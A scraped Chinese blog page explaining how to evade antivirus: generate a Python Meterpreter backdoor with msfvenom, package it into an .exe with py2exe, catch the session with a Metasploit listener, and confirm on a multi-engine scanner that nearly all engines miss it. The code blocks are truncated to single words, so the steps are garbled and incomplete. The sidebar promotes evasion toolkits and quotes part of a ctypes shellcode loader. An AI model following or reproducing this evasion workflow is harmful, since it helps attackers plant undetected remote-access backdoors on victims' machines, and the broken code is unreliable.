python 3.8.5 打包_使用Python进行防病毒免杀

最新推荐文章于 2023-06-11 21:13:46 发布
最新推荐文章于 2023-06-11 21:13:46 发布
阅读量286 收藏
点赞数
文章标签: python 3.8.5 打包

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python

2、msfvenom生成Python Payload

msfvenom

615b5dd8557b05edb953492ffe266cca.png

evil.py 代码如下:

import

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:

from

下面的方法运行 evil.py,生成可执行文件。

python

0fdd98a5654488840e72aefe923aade8.png

0x03 设置监听端口

Kali 运行Metasploit,设置监听:

msfconsole

在Windows中运行evil.exe,获得一个meterpreter的会话

e304877606b196f73b6a5df791188e3d.png

0x04 免杀验证

确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。

这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

网站地址

dad65756abf0c681f93b83642dac5f8e.png

参考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

weixin_39564853
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python制作免杀软件教程及工具.zip
07-26
本资源会教你如何用python制作免杀软件,并提供了所需的代码工具和脚本,亲测能够过360安全卫士和火绒。
为了王心凌,我拳打电脑管家,脚踢金山毒霸,3分钟用Python撸一个杀毒软件
m0_59235699的博客
05-24 208
事情要从一次重保行动说起,由于活动还没结束,这里就先不透漏了。我抱着亲手做的康师傅红烧牛肉泡面,还没开始吃,就听见后面有人喊我名字,说是有个用户的电脑卡死了,要我过去看看。 我问她能不能等我吃完这桶泡面再去,我已经3个小时没有吃过饭了,现在饿得没有力气走到用户那里。 她说那是主任的电脑,你自己看着办吧。 我向来不畏惧权贵,但九年义务教育告诉我,别人有困难的时候一定要去帮一把…… 我到现场一看,电脑上就只有一个空空的桌面,连个鼠标都找不到,看来是电脑太卡了,软件图标都卡没了。 我问用户之前有没有做过什么奇怪的
如何使用Python进行Payload免杀
11-20 685
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候,似...
python打包的exe如何免杀_如何使用Python进行Payload免杀
weixin_39716160的博客
11-26 119
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装Python 2.7.16 x86:http...
python打包的exe如何免杀_Python 制作免杀后门(原创)
weixin_39830175的博客
11-21 607
CentOS6.5下netcat工具安装教程1.下载下载的是netcat-0.7.1.tar.gz版本2.拷贝用U盘拷贝到/home/Hadoop目录下进行解压:cd /home/hadooptar -zxvf netcat-0.7.1.tar.gz -C /usr/local改名:cd /usr/localmv netcat-0.7.1 netcat3.安装切换目录:cd /usr/local/...
python-3.8.5_32bit.zip
09-06
本安装包为Python 3.8.5-32bit位windows版本。Python语言作为IEEE发布的2017年编程语言排行榜中高居首位的编程语言,在大数据分析、人工智能研究等前沿领域具有极高的热度。
python3.8.5
12-19
win7 64位的程序,另一个包是一些依赖库,numpy,openpyxl,matplotlib,opencv_python,pip20.3.3等。没打包成whl文件,解压后替换安装默认生成的site-packages即可
python3.8.5安装包
09-04
Python3.8.5(Windows 64位安装包)内附安装说明,可以按照安装说明中的步骤一步步安装,我后续有时间也会出安装Python的教程,大家可以关注一下,或者也可以上网搜索一下安装教程 注:不支持Windows 7及以下版本
python3.5.0 python3.8.5 python3.8.10 python3.9.6 windows安装包
08-27
python3.5.0 python3.8.5 python3.8.10 python3.9.6 windows安装包
python:Mircrosoft Defender防病毒要重置您的设置
weixin_40981660的博客
08-19 349
通过python,selenium自动化打开谷歌浏览器,出现如下界面 快捷键win+r 运行 ‘regedit’ , ctrl+f 搜索 ‘TriggeredReset’ ,或者直接找下面路径 HKEY_CURRENT_USER\Software\Google\Chrome\TriggeredReset 删除 即可
Python-用于生成到目前为止绕过所有防病毒软件的Bash和Python脚本FUD
08-10
用于生成到目前为止绕过所有防病毒软件的Bash和Python脚本[FUD]
python控制启动防病毒软件下载_用于生成到目前为止绕过所有防病毒软件的Bash和Python脚本[FUD]...
weixin_39711441的博客
12-22 100
Welcome to the ASWCrypter script v1.0 100% FUDAn Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD] ;) .PLEASE DON'T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM23/08/201...
python控制启动防病毒软件_python – 如何自动执行Windows驱动程序和二进制文件的防病毒/ WSUS补丁测试?...
weixin_39559071的博客
02-10 88
有趣的问题.要避免的一件事是使用防病毒API检查您的应用程序是否触发它们.您希望在预期的操作系统上实时部署应用程序,并使用真实的AV安装进行监控.这样你就可以触发启发式监控以及API与之协同工作的简单“这个代码匹配那个校验和”.您还没有告诉我们您的应用程序是什么写的,但如果您的应用程序的测试套件实际上运行了部分应用程序,而不是测试单个代码路径,那么这可能是一个良好的开端.理想情况下,您的集成测试套...
python 防破解_python插件_防暴力破解_Denyhost
weixin_39594439的博客
12-10 182
一、下载安装:需要环境:gcc,python下载地址:https://sourceforge.net/projects/denyhosts/files/进入目录:python setup.py installcp denyhosts.cfg-dist denyhosts.cfgcp daemon-control-dist daemon-controlvi denyhosts.cfgSECURE_L...
学习python免杀知识
gou1791241251的博客
01-06 181
#字符串转十六进制 python3.7 import codecs codecs.encode(“shellcode”) 案例: import ctypes import sys import random decode = sys.argv[1].decode(“hex”) n=random.randint(0,len(decode)-1) shellcode = bytearray(decode[:n]+decode[n:]) ptr = ctypes.windll.kernel32.VirtualAl
安卓免杀,请问apk怎样做免杀,安卓爆红如何解决!
2301_77626828的博客
06-11 1459
3、我们通过测试后发现还会被识别或查杀,这时候我们在程序中具有先进性定位特征码,并修改代码中的特征码,对初学者来说有很大的难度,因为其中牵扯到复合特征码的定位,因为需要大量的病毒库来支持、参考、不利于识别病毒库的升级。2、第二种就是所谓程序员统称的加入一些无用指令类似1+1,1-1等等的代码之类的无用语句,其实真正的含义是让杀毒软件检测不到或者识别不到的特征代码,其中可操作头部代码和区间中加入无效代码。这就是所谓的(加壳)有保护和加密功能,先运行保护和加密功能后在运行我们的真实apk程序文件。
Python打包exe文件踩平坑
老孙头
11-15 453
1. 保存好需要打包的py文件; 2. win+r,打开“运行”窗口,在输入框中输入cmd,打开命令行窗口; 3. 用cd等命令进入到要打包的py文件目录,用下列命令进行打包: pyinstaller-Fxxx.py--noconsole 注意:F是大写 4. 如果pyinstaller不可用,需要安装pyinstaller: pip installpyinstaller 5...
python代码如何打包为.exe文件以及踩过的坑
weixin_49265805的博客
08-15 521
直接下载 我下载不下来,换种方法也不行。 升级下载 pip install --upgrade pyinstaller 成功 打包 西瓜视频找了个消息流程的,就是没加图标 https://www.ixigua.com/6816120410891878920?logTag=sA9usUaFtDBBmaZ0_aeUm 记得支持,点赞。 ...
用PyInstaller将.py文件打包成.exe文件
热门推荐
我喝花间一壶酒的博客
03-17 1万+
上一篇文章中已经把PyInstaller安装好了,下面就来看看怎么用它把写的python程序打包成直接执行的.exe文件。 先写一个简单的判断质数的程序,保存为isprime.py。先用命令提示符运行这个程序。把这个文件复制到PyInstaller文件夹目录下。在命令提示符中打开这个文件夹目录,cd:PyInstaller文件夹目录 python isprime.py 执行python代码,结果如
python 3.8.5 python3.8.10
最新发布
12-29
Python 3.8.5是Python编程语言的一个版本,它在2020年7月发行,具有一些特定的功能和优化。与之相比,Python 3.8.10是Python编程语言的更新版本,它在2021年2月发布,修复了一些错误并对性能进行了优化。 在Python ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值